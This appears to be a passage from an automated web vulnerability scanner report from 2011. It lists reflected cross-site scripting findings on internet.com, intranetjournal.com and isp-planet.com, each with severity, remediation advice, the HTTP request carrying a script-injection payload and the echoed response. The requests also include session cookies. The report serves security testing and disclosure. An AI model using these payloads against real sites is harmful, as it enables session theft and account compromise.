GET /developer?2d7d7<script>alert(1)</script>a487c4b6236=1 HTTP/1.1
Host: www.internet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Set-Cookie: CFID=72104; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:04 GMT; Path=/
Set-Cookie: CFTOKEN=C72D2539-C7D0-457F-8FA9FC8F9D95FC94; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:04 GMT; Path=/
Content-Type: text/html;charset=utf-8
Date: Fri, 18 Feb 2011 14:58:03 GMT
Connection: close


                                                                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
...[SNIP]...
<td class='cfdump_td_struct'>2D7D7<SCRIPT>ALERT(1)</SCRIPT>A487C4B6236</td>
...[SNIP]...

3.76. http://www.intranetjournal.com/ [c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The value of the c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 request parameter is copied into an HTML comment. The payload 5d31c--><script>alert(1)</script>5c6cf7ebb2d was submitted in the c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=15d31c--><script>alert(1)</script>5c6cf7ebb2d HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:23:51 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:24:51 GMT
Content-Type: text/html
Content-Length: 149706


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.intranetjournal.com with position M0
url: /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=15d31c--><script>alert(1)</script>5c6cf7ebb2d -->
...[SNIP]...

3.77. http://www.intranetjournal.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c5d85--><script>alert(1)</script>177b53bcb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?c5d85--><script>alert(1)</script>177b53bcb4=1 HTTP/1.1
Host: www.intranetjournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:54:37 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:55:37 GMT
Connection: close
Content-Type: text/html
Content-Length: 149165


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.intranetjournal.com with position M0
url: /?c5d85--><script>alert(1)</script>177b53bcb4=1 -->
...[SNIP]...

3.78. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /about/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload fd8e5--><script>alert(1)</script>d97a1fbd30c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /about/sitemap.html?fd8e5--><script>alert(1)</script>d97a1fbd30c=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:06 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:06 GMT
Connection: close
Content-Type: text/html
Content-Length: 66636


<HTML>
<HEAD>
<TITLE>ISP-Planet - Welcome</TITLE>
<META name="description" content="ISP-Planet has business and marketing advice for ISPs, plus specialized isp information resources. It reports on IS
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /about/sitemap.html?fd8e5--><script>alert(1)</script>d97a1fbd30c=1 -->
...[SNIP]...

3.79. http://www.isp-planet.com/business/associations/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /business/associations/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f2f36--><script>alert(1)</script>ba42ff8b252 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /business/associations/index.html?f2f36--><script>alert(1)</script>ba42ff8b252=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:42 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:42 GMT
Connection: close
Content-Type: text/html
Content-Length: 52755

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Business - Directory of ISP Associations</title>
<meta n
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /business/associations/index.html?f2f36--><script>alert(1)</script>ba42ff8b252=1 -->
...[SNIP]...

3.80. http://www.isp-planet.com/fixed_wireless/equipment/distributors/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /fixed_wireless/equipment/distributors/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1f2ae--><script>alert(1)</script>0c6527430b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /fixed_wireless/equipment/distributors/index.html?1f2ae--><script>alert(1)</script>0c6527430b4=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:48 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:48 GMT
Connection: close
Content-Type: text/html
Content-Length: 56277

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<title>ISP-Planet - ISP Planet - Fixed Wireless - Equipment - Wireless Equip
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /fixed_wireless/equipment/distributors/index.html?1f2ae--><script>alert(1)</script>0c6527430b4=1 -->
...[SNIP]...

3.81. http://www.isp-planet.com/investor/brokers/chart.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /investor/brokers/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 75d25--><script>alert(1)</script>7fdd3a7eb68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /investor/brokers/chart.html?75d25--><script>alert(1)</script>7fdd3a7eb68=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:45 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:45 GMT
Connection: close
Content-Type: text/html
Content-Length: 59793

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Investor - ISP Broker Quick Reference Chart</title>
<met
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /investor/brokers/chart.html?75d25--><script>alert(1)</script>7fdd3a7eb68=1 -->
...[SNIP]...

3.82. http://www.isp-planet.com/investor/brokers/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /investor/brokers/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c2b47--><script>alert(1)</script>3adb9c78876 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /investor/brokers/index.html?c2b47--><script>alert(1)</script>3adb9c78876=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:51 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 48459

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Investor - ISP Broker Directory</title>
<meta name="chan
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /investor/brokers/index.html?c2b47--><script>alert(1)</script>3adb9c78876=1 -->
...[SNIP]...

3.83. http://www.isp-planet.com/marketing/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /marketing/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e040c--><script>alert(1)</script>71b19238b7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /marketing/index.html?e040c--><script>alert(1)</script>71b19238b7e=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:44 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:44 GMT
Connection: close
Content-Type: text/html
Content-Length: 66631

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - ISP-Marketing</TITLE>
<META NAME="description" CONT
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /marketing/index.html?e040c--><script>alert(1)</script>71b19238b7e=1 -->
...[SNIP]...

3.84. http://www.isp-planet.com/quotes/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /quotes/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 78fc3--><script>alert(1)</script>7dcbdb41c54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /quotes/index.html?78fc3--><script>alert(1)</script>7dcbdb41c54=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:50 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:50 GMT
Connection: close
Content-Type: text/html
Content-Length: 92060

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Notable Quotes</TITLE>
<META NAME="description" CON
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /quotes/index.html?78fc3--><script>alert(1)</script>7dcbdb41c54=1 -->
...[SNIP]...

3.85. http://www.isp-planet.com/resources/backbones/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /resources/backbones/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 629b3--><script>alert(1)</script>75e20150d24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /resources/backbones/index.html?629b3--><script>alert(1)</script>75e20150d24=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:41 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:41 GMT
Connection: close
Content-Type: text/html
Content-Length: 39562

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP Planet - Resources - Backbone Directory: An ISP Guide to National
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/backbones/index.html?629b3--><script>alert(1)</script>75e20150d24=1 -->
...[SNIP]...

3.86. http://www.isp-planet.com/resources/directories/state_puc.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /resources/directories/state_puc.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bcad3--><script>alert(1)</script>5f359aca2e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /resources/directories/state_puc.html?bcad3--><script>alert(1)</script>5f359aca2e4=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:39 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:39 GMT
Connection: close
Content-Type: text/html
Content-Length: 55541

<HTML>
<HEAD>
<TITLE>ISP Planet - Resources - State PUC Directory </TITLE>
<META NAME="description" CONTENT="information on information and resources for ISPs">
<META NAME="channel" CONTENT="ISP Resou
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/directories/state_puc.html?bcad3--><script>alert(1)</script>5f359aca2e4=1 -->
...[SNIP]...

3.87. http://www.isp-planet.com/resources/how_to/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /resources/how_to/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b8237--><script>alert(1)</script>824980c5358 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /resources/how_to/index.html?b8237--><script>alert(1)</script>824980c5358=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:20 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:20 GMT
Connection: close
Content-Type: text/html
Content-Length: 50140

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
   <TITLE>ISP-Planet - Resources - Index.html</TITLE>
<link rel="stylesheet" h
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/how_to/index.html?b8237--><script>alert(1)</script>824980c5358=1 -->
...[SNIP]...

3.88. http://www.isp-planet.com/resources/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /resources/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 12656--><script>alert(1)</script>70658e982ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /resources/index.html?12656--><script>alert(1)</script>70658e982ea=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:01 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:01 GMT
Connection: close
Content-Type: text/html
Content-Length: 42918

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>ISP-Planet - Resources </TITLE>
<META NAME="description" CONTENT="info
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/index.html?12656--><script>alert(1)</script>70658e982ea=1 -->
...[SNIP]...

3.89. http://www.isp-planet.com/resources/index_lawyer.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /resources/index_lawyer.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 64e48--><script>alert(1)</script>f0377a27e76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /resources/index_lawyer.html?64e48--><script>alert(1)</script>f0377a27e76=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
